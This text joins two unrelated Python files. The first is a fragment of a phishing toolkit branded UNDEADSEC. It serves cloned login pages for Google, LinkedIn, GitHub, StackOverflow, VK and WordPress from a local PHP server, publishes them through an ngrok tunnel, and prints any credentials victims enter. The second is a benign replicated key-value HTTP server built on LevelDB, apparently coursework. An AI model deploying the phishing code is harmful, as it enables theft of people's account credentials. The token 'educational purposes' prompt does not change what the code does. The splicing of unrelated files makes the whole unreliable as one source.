elif option2 == '1' and social == 'Google':
system('cp WebPages/google_standard/*.* Server/www/')
elif option2 == '2' and social == 'Google':
system('cp WebPages/google_advanced_poll/*.* Server/www/')
elif social == 'LinkedIN':
system('cp WebPages/linkedin/*.* Server/www/')
elif social == 'Github':
system('cp WebPages/github/*.* Server/www/')
elif social == 'StackOverflow':
system('cp WebPages/stackoverflow/*.* Server/www/')
elif social == 'VK':
system('cp WebPages/vk/*.* Server/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END)
while True:
with open('Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
system('rm -rf Server/www/cat.txt && touch Server/www/cat.txt')
creds.close()
def runPEnv():
system('clear')
print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
'
' '
' '
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v1.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}UA DESIGNER | VK SERVER | FOX | KRAMATORSK{2}
' ' '
' . '
'
{1}'''.format(GREEN, END, CYAN)
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END)
if 256 != system('which php'):
print " --{0}>{1} OK.".format(CYAN, END)
else:
print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END)
exit(0)
if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool just for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N':
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIN')
option2 = ''
runPhishing('LinkedIN', option2)
elif option == '4':
loadModule('Github')
option2 = ''
runPhishing('Github', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:80")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
simple_http_server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
import json
import sys
import datetime
import plyvel
import requests
import threading
rec = False
class RequestHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def do_GET(self):
print(threading.currentThread().getName())
parsed_path = urlparse(self.path)
# handle read request
if parsed_path.path == "/kv/":
# the database is still under recover
if not rec:
message = json.dumps({"is_key_in": "NA"})
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
# print('key is = ', parsed_path.query.split("=")[-1])
print("receive read request")
k = parsed_path.query.split("=")[-1]
v = db1.get(k.encode())
s = {"is_key_in": "yes", "value": v.decode()} if v else {"is_key_in": "no", "value": "None"}
message = json.dumps(s)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
# data recover from failure
if parsed_path.path == "/rec/":
print("receive recover request")
if not rec:
message = json.dumps({})
self.send_response(400)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
t = parsed_path.query.split("=")[-1]
dic = {}
for k, v in db2.iterator(start=t.encode()):
dic[k.decode()] = v.decode()
message = json.dumps(dic)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
def do_POST(self):
print(threading.currentThread().getName())
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
data = json.loads(post_body.decode())
parsed_path = urlparse(self.path)
# direct write request
if parsed_path.path == "/kv/":
# print("post key is = ", data['k'])
# print("post value is = ", data['v'])
print("receive write request")
t = str(datetime.datetime.now())
k, v = data['k'], data['v']
old_t = db3.get(k.encode())
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp with this key
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# record key-value
old_v = db1.get(k.encode())
# update value
db1.put(k.encode(), v.encode())
# launch http request to sync data for other servers
# even if a server crashes, we will still try to sync with it
for port in server_ports:
if port != server_port:
try:
r = requests.post(url = 'http://%s:%s/sync/' % (server_ip, port), json = {"k": k, "v": v, "t": t}, timeout=3)
except (requests.ConnectionError, requests.Timeout):
print("Sync Timeout: process %s:%s dead!" % (server_ip, port))
s = {"is_key_in": "yes", "old_value": old_v.decode()} if old_v else {"is_key_in": "no", "old_value": "None"}
message = json.dumps(s)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
# data sync during run-time
if parsed_path.path == "/sync/":
# print("post key is = ", data['k'])
# print("post value is = ", data['v'])
# print("post timestamp is = ", data['t'])
print("receive sync request")
k, v, t = data['k'], data['v'], data['t']
old_t = db3.get(k.encode())
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp with this key
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# update value
db1.put(k.encode(), v.encode())
message = json.dumps({})
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
def recover_db():
global rec
print("start db recover process...")
# start the recover process
# get the latest timestamp in db
try:
latest_t = next(db2.iterator(reverse=True))[0].split("[")[0]
except:
latest_t = "0000-00-00 00:00:00.000000"
for port in server_ports:
if port != server_port:
try:
r = requests.get(url = 'http://%s:%s/rec/?t=%s' % (server_ip, port, latest_t))
except requests.ConnectionError:
print("Sync Timeout: process %s:%s dead!" % (server_ip, port))
else:
if r.status_code == 200:
# write to db
for tk, v in r.json().items():
t, k = tk.split("[")[:2]
old_t = db3.get(k.encode())
if old_t and old_t.decode() < t:
continue
else:
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# update value
db1.put(k.encode(), v.encode())
# done with the recovery
break
else:
print("Wrong Status Code: process %s:%s not ready!" % (server_ip, port))
rec = True
print("finish db recover process")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
server_ip, server_ports, server_index = sys.argv[1], sys.argv[2].split(','), int(sys.argv[3])
server_port = server_ports[server_index]
# reconnect to the database
# key->value
db1 = plyvel.DB('/tmp/cs739db-%s-1/' % server_port, create_if_missing=True)
# timestampe+key->value
db2 = plyvel.DB('/tmp/cs739db-%s-2/' % server_port, create_if_missing=True)
# key->timestamp
db3 = plyvel.DB('/tmp/cs739db-%s-3/' % server_port, create_if_missing=True)
# set recover flag
rec = False
# lauch a thread for data restore
threading.Thread(target=recover_db).start()
server = ThreadedHTTPServer((server_ip, int(server_port)), RequestHandler)
print('Starting server at http://%s:%s' % (server_ip, server_port))
server.serve_forever()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.